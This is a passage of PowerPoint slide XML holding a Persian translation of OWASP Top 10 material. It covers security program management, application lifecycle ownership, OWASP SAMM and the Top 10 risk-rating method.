                        <a:t>های آنها برنامه امنیتی امنیتی برنامه را ایجاد می کند. به دست آوردن امنیت نرم افزار نیازمند بخشهای مختلف سازمان است تا کارآیی با همکاری، از جمله امنیت و حسابرسی، توسعه نرم افزار، کسب و کار و مدیریت اجرایی. امنیت باید قابل مشاهده و قابل اندازه گیری باشد، به طوری که تمام بازیکنان مختلف می توانند وضعیت امنیت نرم افزار سازمان را ببینند و درک کنند. تمرکز بر فعالیت ها و نتایجی که در حقیقت به بهبود امنیت شرکت ها با حذف یا کاهش خطر کمک می کند. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP SAMM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> و راهنمای امنیت نرم افزار </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>برای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>CISOs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>منبع بسیاری از فعالیت های کلیدی در این لیست است.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>گام بعدی برای مدیران برنامه ها</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1982086923"/>
              </p:ext>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F9A383-1D7C-437C-BD6E-2E22B4AF47C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="40133" y="8879889"/>
            <a:ext cx="1215135" cy="383182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>مهیا سازی قابل رویت بودن مدیریت</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2401667392"/>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43548">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مدیریت چرخه حیات کامل برنامه کاربردی</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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622852">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>برنامه های کاربردی متعلق به سیستم پیچیده ترین سیستم ها هستند که به طور مرتب ایجاد و نگهداری می شوند. مدیریت فناوری اطلاعات برای یک برنامه باید توسط متخصصان فناوری اطلاعات انجام شود که مسئولیت کل چرخه عمر فناوری اطلاعات یک برنامه را دارند. پیشنهاد می کنیم نقش مدیر برنامه را به عنوان متخصص فنی مالک نرم افزار تعیین کنید. مدیر برنامه مسئول تمام چرخه عمر برنامه از دیدگاه فناوری اطلاعات است، از جمع آوری الزامات تا سیستم های بازنشستگی که اغلب نادیده گرفته می شوند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a: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r>
                      <a:b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+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>گام بعدی برای مدیران برنامه ها</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2162184608"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2207695"/>
          <a:ext cx="6858000" cy="75083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395571494"/>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43556">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>این بخش درباره ریسک‌هایی است که از ضعف ها نشات میگیرند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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622844">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>روش رتبه بندی ریسک </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> بر پایه </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>روش رتبه</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t> بندی ریسک </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> است. برای هر دسته </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>TOP 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> ما ریسک نوعی ریسک را که هر ضعف یک برنامه تحت وب را معرفی می‌کند با نگاه به فاکتورهای احتمال و تاثیر برای هر ضعف متداول. سپس ما </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>TOP 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> را بر اساس آن ضعف‌ها که به صورت نوعی مهم‌ترین ریسک برای یک برنامه را مشخص می‌کند، مرتب می‌کنیم. این فاکتورها با هر بار انتشار جدید </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>TOP 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> به‌روز می‌شوندچون همه چیز تغییر می‌کند و تکامل می‌یابد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fa-IR" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>روش رتبه</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t> بندی ریسک </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> فاکتورهای متعددی برای کمک به محاسبه ریسک یک برنامه شناخته شده ارائه می‌کند. اگرچه </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>TOP 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> بیشتر درباره کلیات صحبت می‌کند تا آسیب‌پذیر‌ی‌های خاصی در برنامه‌های واقعی و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ها. در نتیجه ما هیچ وقت نمی‌توانیم به اندازه صاحب یا مدیر یک برنامه دقیق باشیم وقتی که برای برنامه‌(ها)ی آنها ریسک را محاسبه می‌کنیم. شما بهترین فرد برای قضاوت درباره اهمیت برنامه‌ها و داده‌هایتان هستید، تهدید‌های شما چه هستند و چگونه سیستم شما ساخته شده است و کار می‌کند.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>روش ما شامل سه فاکتور احتمالی برای هر آسیب‌پذیری است (شیوع، قابلیت تشخیص و سادگی بهره‌جویی) و یک فاکتور تاثیر (تاثیر فنی). مقلیس ریسک برای هر فاکتور در بازه کم-1 تا زیاد-3 قرار دارد همراه با واژه‌شناسی برای هر فاکتور تعیین شده. شیوع یک آسیب‌پذیری فاکتوری است که معمولا لازم نیست محاسبه شود. برای داده شیوع ما آماری از شرکت‌های مختلف تهیه کرده‌ایم (که در بخش تقدیر و تشکر در صفحه 25 آورده شده است) و ما داده‌های آنها را باهم تجمیع کردیم تا با لیست احتمال </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>TOP 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> منطبق شود. این داده‌ها بعدا با فاکتور‌های احتمالی دیگری (قابلیت تشخیص و سادگی بهره‌جویی ) ترکیب شد تا رتبه احتمالی هر آسیب‌پذیری محاسبه شود. رتبه بندی احتمال بعدا با ضرب در تخمین میانگین تاثیرفنی برای هر آیتم محاسبه می‌شود تا به طور کلی با رتبه‌بندی ریسک برای هر آیتم در </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>TOP 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> (نتیجه بالاتر به معنی ریسک بالاتر است) همراه باشد. قابلیت تشخیص، سادگی بهره‌جویی و تاثیر از آنالیز گزارش‌های </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>CVE</a:t>
                      </a:r>
                      <a:r>
